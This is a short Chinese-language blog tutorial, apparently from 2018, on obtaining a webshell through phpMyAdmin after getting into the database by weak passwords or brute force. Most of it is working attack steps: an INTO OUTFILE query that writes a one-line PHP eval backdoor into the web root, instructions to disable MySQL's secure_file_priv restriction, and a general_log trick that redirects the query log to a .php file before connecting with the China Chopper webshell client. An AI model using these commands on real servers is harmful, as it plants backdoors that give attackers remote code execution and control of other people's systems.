phpmyadmin getshell

2018-02-04  本文已影响809人  CSeroad

在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录时,进而通过弱口令或者暴力破解进入数据库之后,有多种方法进行getshell

注:大多数集成包里自带,如:phpstudy,wampserver,xampp等

实验环境:windows   phpstudy集成环境

into outfile

最常用的是一句话木马的写入

select '<?php eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy/www/xxx.php';

当然,前提是你得知道网站的绝对路径,方法也有很多,比如通过报错获取路径,通过phpinfo.php等等

但在新版的mysql中,这句话并没有运行成功

错误

mysql新特性secure_file_priv会对读写文件产生影响,该参数用来限制导入导出

可以查看该参数 

show global variables like '%secure%';

当secure_file_priv为NULL时,表示限制mysql不允许导入导出。所以爆出错误

要想使得该语句导出成功,则需要在mysql文件夹下修改my.ini 文件,

在[mysqld]内加入secure_file_priv ="" 即可

secure_file_priv

当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

此时就可以执行导出命令

利用日志文件

mysql 5.0版本以上会创建日志文件,修改日志的全局变量,也可以getshell。但是也要对生成的日志有可读可写的权限。

注:linux因为权限问题亲测没有成功

查看日志状态 

show variables  like  '%general%';

日志

当开启general时,所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件

那么,如果修改general_log_file的值,那么所执行的sql语句就会对应生成

进而getshell

SET GLOBAL general_log='on'

开启日志

SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'

设置日志的路径

对应就会生成xxx.php文件

xxx.php

将一句话木马写入xxx.php文件

SELECT '<?php eval($_POST["cmd"]);?>'

一句话木马 对应的日志文件

中国菜刀连接,getshell

getshell
上一篇下一篇

猜你喜欢

热点阅读